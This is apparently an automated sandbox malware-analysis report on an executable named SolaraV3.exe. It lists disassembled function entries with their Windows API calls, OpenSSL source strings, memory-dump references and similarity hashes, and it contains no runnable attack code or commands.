Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DC71CF4B), ref: 00007FF6DC71D07C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DC71CF4B), ref: 00007FF6DC71D107

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction ID: d4086e19ec2e577cb964cee3a3ddfca5792207dcce4a95709d42c44aaaa03619
Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction Fuzzy Hash: 4691E532F1865A89F7619F6994602BD2BA0BB54BD8F14613BDE0E97684DF3CD463CB00

Function 00007FFB0B812DF1 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFB0B97B9B0

Strings

unknown, xrefs: 00007FFB0B97B9E3, 00007FFB0B97BAAA
Operation not permitted, xrefs: 00007FFB0B97B9A4

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: ErrorLast
String ID: Operation not permitted$unknown
API String ID: 1452528299-31098287
Opcode ID: 4f38512cd59b4e9079a15f4968c6b5057c5ac8c27ef1edf97390e5a951f79121
Instruction ID: c1190f1bdccbec8ad5bf378d072bfe5aab097b5d2d7ba7a0fc16d72e833bed9f
Opcode Fuzzy Hash: 4f38512cd59b4e9079a15f4968c6b5057c5ac8c27ef1edf97390e5a951f79121
Instruction Fuzzy Hash: 348127E6A5974786EA10AB31E864BB963E4FF84B84F84C435DA4FC72B5DE3DE4408700

Function 00007FF6DC71F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6DC71FA7C
_get_daylight.LIBCMT ref: 00007FF6DC71FA8D
_get_daylight.LIBCMT ref: 00007FF6DC71FA9E
_isindst.LIBCMT ref: 00007FF6DC71FB69

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction ID: 0d8dca4ddf6bb01763834372b7d4b8cd04cdda96f7d9d93027bf4b6b5b985562
Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction Fuzzy Hash: E051F472F042198AEB24CF7C99756BC27A5AB44368F501236EE1E92AE5DF3CA5138700

Function 00007FF6DC71577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF6DC7157AF
GetFileInformationByHandle.KERNEL32 ref: 00007FF6DC715811
GetLastError.KERNEL32 ref: 00007FF6DC7158A2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DC7156B4), ref: 00007FF6DC7158EE

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction ID: 8ca903d05b4fe6d0601630d8177329e033a12db61ff2a03246d91cecf4230eba
Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction Fuzzy Hash: 3A51AF22E086458AFB64CF75D4603BD37B1EB48B58F14A436DE0D97689DF38D4628700

Function 00007FF6DC7020C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6DC7020F4
SetWindowLongPtrW.USER32 ref: 00007FF6DC702116
GetWindowLongPtrW.USER32 ref: 00007FF6DC702140
InvalidateRect.USER32 ref: 00007FF6DC702160

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 74362662c604f7e7c5f40a0a0847d562cf88e9f5bed9ed89757d8954ecb2912c
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 0111CC32F1C14A42F655976BE58427E52A1EF887C1F548032DF5987B9ACD3EE4E69300

Function 00007FF6DC70D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6DC70D03C
GetCurrentThreadId.KERNEL32 ref: 00007FF6DC70D04A
GetCurrentProcessId.KERNEL32 ref: 00007FF6DC70D056
QueryPerformanceCounter.KERNEL32 ref: 00007FF6DC70D066

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction ID: ce08adde9aabb61b9443b9aac59d83fd0334e1be90b2680114abd763de43213f
Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction Fuzzy Hash: 40113C22B14F098AEB10CF70E8542BD33A4FB59758F440E36EA6D867A4DF7CD1668340

Function 00007FF6DC725B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6DC721760: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC721793

_get_daylight.LIBCMT ref: 00007FF6DC725C34
_get_daylight.LIBCMT ref: 00007FF6DC725C45

Strings

?, xrefs: 00007FF6DC725BC5

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
Instruction ID: 50d53b75fb76f07c055c764a682fe6b2492e9f35f77b94a09d3338bf0f5a05a6
Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
Instruction Fuzzy Hash: ED412B22A1828A46FBB18B25D52137DA755EB80BA8F144237EE5C87BD5DF3CD4A38700

Function 00007FFB0B812748 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

00007FFB2ADB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFB0B8BA592

Strings

%02d%02d%02d%02d%02d%02dZ, xrefs: 00007FFB0B8BA6A5
%04d%02d%02d%02d%02d%02dZ, xrefs: 00007FFB0B8BA698

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: 00007
String ID: %02d%02d%02d%02d%02d%02dZ$%04d%02d%02d%02d%02d%02dZ
API String ID: 3568877910-2648760357
Opcode ID: 44843c6316de3de0d0998b74d2a3bbc3a6269f6be012f31292ad9ddc303ef141
Instruction ID: c2b8eb4089a3e46bcfae6582dca435ac2cdc2cf4678a84cbe9cfc3508e73218e
Opcode Fuzzy Hash: 44843c6316de3de0d0998b74d2a3bbc3a6269f6be012f31292ad9ddc303ef141
Instruction Fuzzy Hash: 7D5122B2A197818AD764CF35E440E6AB7A4FB89750F449135EA8EC7B79DF3CE5408B00

Function 00007FFB0B811613 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 00007FFB0B8D691E
getaddrinfo.WS2_32 ref: 00007FFB0B8D695F

Strings

..\s\crypto\bio\b_addr.c, xrefs: 00007FFB0B8D698C, 00007FFB0B8D69D3, 00007FFB0B8D69FF

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: getaddrinfo
String ID: ..\s\crypto\bio\b_addr.c
API String ID: 300660673-2547254400
Opcode ID: ff362b2e146a9955ea5a374bf5228206e2dd813b74c8d22398f2e98f30882444
Instruction ID: 8cb05a3e228c13ad515d7a702ccb40f4cbc823b169dd04a935be67dff18d500f
Opcode Fuzzy Hash: ff362b2e146a9955ea5a374bf5228206e2dd813b74c8d22398f2e98f30882444
Instruction Fuzzy Hash: 4E4184B2A1878687E7509B76E441EB97750FB84740F508136EA8B87B75EF3CD4458B40

Function 00007FFB0C3523C4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

00007FFB1C3B11F0.VCRUNTIME140 ref: 00007FFB0C38ED98
00007FFB1C3B11F0.VCRUNTIME140 ref: 00007FFB0C38EDCF

Strings

..\s\ssl\statem\extensions_clnt.c, xrefs: 00007FFB0C38ECDE, 00007FFB0C38EE14, 00007FFB0C38EE48

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\statem\extensions_clnt.c
API String ID: 3568877910-592572767
Opcode ID: 2277d602e12e024388a9d4cef9287e1d4121b4c948b8fb80c28345a1f791c9cc
Instruction ID: 1123b02d9f1cdc2d4c37cba43d790b1486e8aaeccc5c0be061602811c09103ba
Opcode Fuzzy Hash: 2277d602e12e024388a9d4cef9287e1d4121b4c948b8fb80c28345a1f791c9cc
Instruction Fuzzy Hash: CD41B1F2718B8186EB608B21E548AAD73A4FF84BC4F544032DB5C17B99DF3CE5A98704

Function 00007FF6DC719014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC719046

Part of subcall function 00007FF6DC71A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A95E
Part of subcall function 00007FF6DC71A948: GetLastError.KERNEL32(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A968

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6DC70CBA5), ref: 00007FF6DC719064

Strings

C:\Users\user\Desktop\SolaraV3.exe, xrefs: 00007FF6DC719052

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\SolaraV3.exe
API String ID: 3580290477-3821142706
Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
Instruction ID: cf413cdc6034cf69c3cfac53a21962f8c7e91602477c9449305620ca662dacc8
Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
Instruction Fuzzy Hash: 7A419332A08B0A85EB16DF29D4610BD67A4EF457E0B556037EA4E87B85DF3DE4A3C300

Function 00007FF6DC71CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6DC71CD4F
GetLastError.KERNEL32 ref: 00007FF6DC71CD71

Strings

U, xrefs: 00007FF6DC71CCFB

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction ID: 95180ee3ee2303403aed47978d376b4598dc0a8f2f4035bad47d2dd0ca4144db
Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction Fuzzy Hash: BF41C532728A5985DB208F69E4553AD6761FB88784F545132EE8DC7794EF3CD412CB40

Function 00007FFB0BA55DE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

00007FFB1C3B1170.VCRUNTIME140 ref: 00007FFB0BA55E4F

Strings

E, xrefs: 00007FFB0BA55ED1
..\s\crypto\x509v3\v3_utl.c, xrefs: 00007FFB0BA55E24, 00007FFB0BA55E60, 00007FFB0BA55E7D, 00007FFB0BA55ED9, 00007FFB0BA55F04, 00007FFB0BA55F19, 00007FFB0BA55F2E

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: 00007B1170
String ID: ..\s\crypto\x509v3\v3_utl.c$E
API String ID: 1749704820-2813183830
Opcode ID: 6e13b30c986bf9580dcb7ec6a5b8c4a30080d2e2f9cbe34a24dfbf94d626d381
Instruction ID: 4fd789209ce09a13f2b350cd5ae5b882c35ca1af8887cce7fe233c91c405eb68
Opcode Fuzzy Hash: 6e13b30c986bf9580dcb7ec6a5b8c4a30080d2e2f9cbe34a24dfbf94d626d381
Instruction Fuzzy Hash: 1B412DA1B0A74281FA54EF32E400F696294AF55B80F88C835DE4E977B6DF3CE655CB00

Function 00007FFB0B8139BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

00007FFB2AE2EFC0.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FFB0B9DFA2D

Strings

..\s\crypto\rand\randfile.c, xrefs: 00007FFB0B9DF98C, 00007FFB0B9DF9F0
Filename=, xrefs: 00007FFB0B9DF9A2, 00007FFB0B9DFA11

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
